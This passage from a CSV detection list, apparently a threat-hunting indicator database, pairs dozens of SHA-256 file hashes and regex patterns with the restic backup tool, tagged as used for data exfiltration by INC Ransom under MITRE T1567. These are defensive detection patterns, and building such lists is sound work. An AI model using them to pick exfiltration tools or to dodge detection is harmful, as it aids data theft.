Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*1ba52a6f7c12d32fd2a9d21503bcbed51533a07f24c6aa94f82b7d58eb87841d*",".{0,1000}1ba52a6f7c12d32fd2a9d21503bcbed51533a07f24c6aa94f82b7d58eb87841d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*1c07a12c276062d9c70006a6e7377b7297d510ce78d52f9e62e3848ad585a822*",".{0,1000}1c07a12c276062d9c70006a6e7377b7297d510ce78d52f9e62e3848ad585a822.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*1cc8655fa99f06e787871a9f8b5ceec283c856fa341a5b38824a0ca89420b0fe*",".{0,1000}1cc8655fa99f06e787871a9f8b5ceec283c856fa341a5b38824a0ca89420b0fe.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*1d347f8bda31bc7dfce658a6b17459f32b7f8d2b76708d30bc5ee7cd3e9eab5b*",".{0,1000}1d347f8bda31bc7dfce658a6b17459f32b7f8d2b76708d30bc5ee7cd3e9eab5b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*1e0e0d1e7388beaa2a892c057759fdfe6a4fe915f9518c73068761f8d6d7619d*",".{0,1000}1e0e0d1e7388beaa2a892c057759fdfe6a4fe915f9518c73068761f8d6d7619d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*1e93b311f27b676be80419ae9ada6e3e599fb38e204bf27ecd14320e1b4dc1c3*",".{0,1000}1e93b311f27b676be80419ae9ada6e3e599fb38e204bf27ecd14320e1b4dc1c3.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*1e9aca80c4f4e263c72a83d4333a9dac0e24b24e1fe11a8dc1d9b38d77883705*",".{0,1000}1e9aca80c4f4e263c72a83d4333a9dac0e24b24e1fe11a8dc1d9b38d77883705.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*1eab0f66e1cf84017ad8aac6358d7bd50fef62477281b9492ccf772be20caf3c*",".{0,1000}1eab0f66e1cf84017ad8aac6358d7bd50fef62477281b9492ccf772be20caf3c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*1ed7632518a86fa468f5823d6da4826d1787845cc0969a46da110c98139a3db4*",".{0,1000}1ed7632518a86fa468f5823d6da4826d1787845cc0969a46da110c98139a3db4.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*1ede16b360710fe5f9471474979f8cca5ad6e2005bd0088c3d54a3272677fb4d*",".{0,1000}1ede16b360710fe5f9471474979f8cca5ad6e2005bd0088c3d54a3272677fb4d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*1f9d03503d8756311b7904e99aee3460f1ace427aad88f6dcba6a97a9c5a8171*",".{0,1000}1f9d03503d8756311b7904e99aee3460f1ace427aad88f6dcba6a97a9c5a8171.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*1fb74dc72e792566b0caf2c596b7d6e655caaa678b8cc0c1f6975427d64746e0*",".{0,1000}1fb74dc72e792566b0caf2c596b7d6e655caaa678b8cc0c1f6975427d64746e0.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*1fde906bc848a16734929e3d27c2223ab4e5be688b497cdcd8a0c4849931769b*",".{0,1000}1fde906bc848a16734929e3d27c2223ab4e5be688b497cdcd8a0c4849931769b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*20a8ce365cfc6c0fd2dd88d2e68eaeaff42970f3e1ff34bb6ff8b6d6ebeaa58f*",".{0,1000}20a8ce365cfc6c0fd2dd88d2e68eaeaff42970f3e1ff34bb6ff8b6d6ebeaa58f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*20cd35745fdb39b8ced14a6351b96ddd0c5eb248b7fb5a4ef7a3b6a7ea9bdb9b*",".{0,1000}20cd35745fdb39b8ced14a6351b96ddd0c5eb248b7fb5a4ef7a3b6a7ea9bdb9b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*20d323af78ca61c911fc9558d3621307e6a5beaaa635346bce8b5a6211c6a8f3*",".{0,1000}20d323af78ca61c911fc9558d3621307e6a5beaaa635346bce8b5a6211c6a8f3.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*20d91064fbae6a009aa552a11389523f977c8bf49c1bfbd2ce5f7e33609beb08*",".{0,1000}20d91064fbae6a009aa552a11389523f977c8bf49c1bfbd2ce5f7e33609beb08.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*2104df5140488fec740f2f225439d14e11343dc6865f7220cb407d83b0089068*",".{0,1000}2104df5140488fec740f2f225439d14e11343dc6865f7220cb407d83b0089068.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*21420350ef2f6884e9ef0d21c1ef82867f992e2b809b4ceb8292a8ab8dd02d3a*",".{0,1000}21420350ef2f6884e9ef0d21c1ef82867f992e2b809b4ceb8292a8ab8dd02d3a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*21d614435d3d6e1e26ed3a4654232d1c1350a846cff9f620dc9e76944fd516b3*",".{0,1000}21d614435d3d6e1e26ed3a4654232d1c1350a846cff9f620dc9e76944fd516b3.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*2267fd0ff2e6387c44e736eccceba289a2b273fc3ccec5786af82415a1c9fa5b*",".{0,1000}2267fd0ff2e6387c44e736eccceba289a2b273fc3ccec5786af82415a1c9fa5b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*22725b8da1f7759e83424dbef84e89614767804a22e49feaba0013587f21208a*",".{0,1000}22725b8da1f7759e83424dbef84e89614767804a22e49feaba0013587f21208a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*22cc11da0c91690bdea21d873ea341d8d31f44ba32602a2e3c40809b334cdf19*",".{0,1000}22cc11da0c91690bdea21d873ea341d8d31f44ba32602a2e3c40809b334cdf19.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*239f075f17c926b724d3128ce8368fa8bb7671ff89524e445312ce115c8f727b*",".{0,1000}239f075f17c926b724d3128ce8368fa8bb7671ff89524e445312ce115c8f727b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*23c553049bbad7d777cd3b3d6065efa2edc2be13fd5eb1af15b43b6bfaf70bac*",".{0,1000}23c553049bbad7d777cd3b3d6065efa2edc2be13fd5eb1af15b43b6bfaf70bac.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*23d83edaf39639ad843dc07a853215fae94265e590e6242951df5e6441dac3c4*",".{0,1000}23d83edaf39639ad843dc07a853215fae94265e590e6242951df5e6441dac3c4.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*23e12a93521ba83f5a5d238030dec3cc47788a47e252eb06335b613695fe9d34*",".{0,1000}23e12a93521ba83f5a5d238030dec3cc47788a47e252eb06335b613695fe9d34.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*24125fd40e20be4c607e7ff58bdce302473460f5d31cba9172cdff2946878d1f*",".{0,1000}24125fd40e20be4c607e7ff58bdce302473460f5d31cba9172cdff2946878d1f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*2467af3d886f3bd9838846f40134537336671a7ff34370145b233a3f9f265beb*",".{0,1000}2467af3d886f3bd9838846f40134537336671a7ff34370145b233a3f9f265beb.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*24c7ca3fe6905b3a493a67237ff081ba9e11abfb27dcb73f18d0a4595926c35d*",".{0,1000}24c7ca3fe6905b3a493a67237ff081ba9e11abfb27dcb73f18d0a4595926c35d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*2536aad7d213c553a2aa3b6c6d3402bb9adf2c7624bf004a14a19751b24ce80e*",".{0,1000}2536aad7d213c553a2aa3b6c6d3402bb9adf2c7624bf004a14a19751b24ce80e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*2655b585e686b5d6c36d1be640d873fa15a53a86c46e2ceb5fb00eb562c428bb*",".{0,1000}2655b585e686b5d6c36d1be640d873fa15a53a86c46e2ceb5fb00eb562c428bb.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*265b1f417eafc654b5e789ce044de99635c542f2490708835b95669ed4fa79b1*",".{0,1000}265b1f417eafc654b5e789ce044de99635c542f2490708835b95669ed4fa79b1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*26850257bff3d64408313c3f6750f9d3880a3729568bd78a40b1d75ca3d4cea1*",".{0,1000}26850257bff3d64408313c3f6750f9d3880a3729568bd78a40b1d75ca3d4cea1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*26c4c55363fc2a15122a97384a44c73fedf14b832721a0b4a86dc361468e7547*",".{0,1000}26c4c55363fc2a15122a97384a44c73fedf14b832721a0b4a86dc361468e7547.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*26d3bc4ed714c268ba2fc84034d54cbeabc230ab2e498e119a2243cefd9a93f3*",".{0,1000}26d3bc4ed714c268ba2fc84034d54cbeabc230ab2e498e119a2243cefd9a93f3.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*27e14febe4ff06aa6a51e01d239d2d4e3af88407d59ffd8feffe54247309b50a*",".{0,1000}27e14febe4ff06aa6a51e01d239d2d4e3af88407d59ffd8feffe54247309b50a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*27e5b4ad48de612df3a28a8ca9d0b4015b6d24e959056d66367ec53246899e44*",".{0,1000}27e5b4ad48de612df3a28a8ca9d0b4015b6d24e959056d66367ec53246899e44.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*286cf8ac789b4752825dd6098cae26394b8803b99cd2d4cdb2153d9ef73f49c4*",".{0,1000}286cf8ac789b4752825dd6098cae26394b8803b99cd2d4cdb2153d9ef73f49c4.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*287f321328930e9fcb910c216b530c9e6fc1badefa4797779369b455f16f32a6*",".{0,1000}287f321328930e9fcb910c216b530c9e6fc1badefa4797779369b455f16f32a6.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*288bac8790bd8f10894a70733ed78bb7afc098d55b41fe6dc4e044f80ef5612e*",".{0,1000}288bac8790bd8f10894a70733ed78bb7afc098d55b41fe6dc4e044f80ef5612e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*297ce47c277bcb97df904493b594d6a6e2ddf8c304d572214b53089f0eb55d42*",".{0,1000}297ce47c277bcb97df904493b594d6a6e2ddf8c304d572214b53089f0eb55d42.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*29b4b4f15c9b4d74a44576c80e5cbc3cc4644bf55a7c2ba29c73b3d9e4f24356*",".{0,1000}29b4b4f15c9b4d74a44576c80e5cbc3cc4644bf55a7c2ba29c73b3d9e4f24356.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*29bc472e151a34cdc5dc5229a27ad5377d091df53500e7ad0022d663a4b9d3a7*",".{0,1000}29bc472e151a34cdc5dc5229a27ad5377d091df53500e7ad0022d663a4b9d3a7.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*29d8abba60342eb0cdac692d050c95feab0aa980a2c8779fa4584f97b8196f26*",".{0,1000}29d8abba60342eb0cdac692d050c95feab0aa980a2c8779fa4584f97b8196f26.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*2a782979f8065e162c99cbba25bd80ace68c743192703e7b2d4cc6ca0acf5625*",".{0,1000}2a782979f8065e162c99cbba25bd80ace68c743192703e7b2d4cc6ca0acf5625.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*2b3ac83c63ff25980360d246ecf86132dd1cfe3416957f145847c80494750846*",".{0,1000}2b3ac83c63ff25980360d246ecf86132dd1cfe3416957f145847c80494750846.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*2c279e408c09fe9be4dad0a1f688b228a8e1948ffca2ab04431fbc53c7877c19*",".{0,1000}2c279e408c09fe9be4dad0a1f688b228a8e1948ffca2ab04431fbc53c7877c19.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*2c50ac9cc40a98a74c88cc3ee248e1550464009866d44356f1db0c3cc6433903*",".{0,1000}2c50ac9cc40a98a74c88cc3ee248e1550464009866d44356f1db0c3cc6433903.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*2e7585939693c87bbb35a55bdce13253747dcbab8ec4eab0e10b342ffe9148a4*",".{0,1000}2e7585939693c87bbb35a55bdce13253747dcbab8ec4eab0e10b342ffe9148a4.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*2e8a57f0d1d2b90d67253d1287159dc467bdb7f3b385be2db39e7213b44672be*",".{0,1000}2e8a57f0d1d2b90d67253d1287159dc467bdb7f3b385be2db39e7213b44672be.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*2ec2fe545387d5c91845130aad884ee212fdf3374690dfceaa422ad7545ea7a0*",".{0,1000}2ec2fe545387d5c91845130aad884ee212fdf3374690dfceaa422ad7545ea7a0.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*2ee2106e77f6c197ed167c064e4cd24cdca2a824c3d37805e201c9eed6c2f3a2*",".{0,1000}2ee2106e77f6c197ed167c064e4cd24cdca2a824c3d37805e201c9eed6c2f3a2.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*2f2d847e45c63766134c300e0fffec4acc13141b7fa23e77485e14592a933b4b*",".{0,1000}2f2d847e45c63766134c300e0fffec4acc13141b7fa23e77485e14592a933b4b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*2f46c381b4f2964068e256f85f11cacdda75601cf0ef5069e08b3ed91c2f7c9c*",".{0,1000}2f46c381b4f2964068e256f85f11cacdda75601cf0ef5069e08b3ed91c2f7c9c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*2f5301deb35d5d2bd0639dc172247df8b33dddb04034addf3d42c9bf2a9bacc6*",".{0,1000}2f5301deb35d5d2bd0639dc172247df8b33dddb04034addf3d42c9bf2a9bacc6.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*2f81bffd408e9f57f31d9c91dd59473bbd57dd27d6e90eb582db2365bf3faf1b*",".{0,1000}2f81bffd408e9f57f31d9c91dd59473bbd57dd27d6e90eb582db2365bf3faf1b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*3000e68455aa68222a46c10161ffdd921929fb2a14d5093cb4f64a569737c50c*",".{0,1000}3000e68455aa68222a46c10161ffdd921929fb2a14d5093cb4f64a569737c50c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*303d31423ac6fc64a185886ae639a9f85126cc39e4bc0c58ca1320a06cd2ac2c*",".{0,1000}303d31423ac6fc64a185886ae639a9f85126cc39e4bc0c58ca1320a06cd2ac2c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*30c290f0f1d6bb3553604c337d4a85cd38b7b5c8dc738386cda54ff740a9bb1f*",".{0,1000}30c290f0f1d6bb3553604c337d4a85cd38b7b5c8dc738386cda54ff740a9bb1f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*311a9c3ba000730148d78ed854f7235a3d05530ccfff5a868cb6357ec93b83c3*",".{0,1000}311a9c3ba000730148d78ed854f7235a3d05530ccfff5a868cb6357ec93b83c3.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*31339090e3e8a044d014b9341c025cf59bf7bc133ae267bc5acdea5ac07837a9*",".{0,1000}31339090e3e8a044d014b9341c025cf59bf7bc133ae267bc5acdea5ac07837a9.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
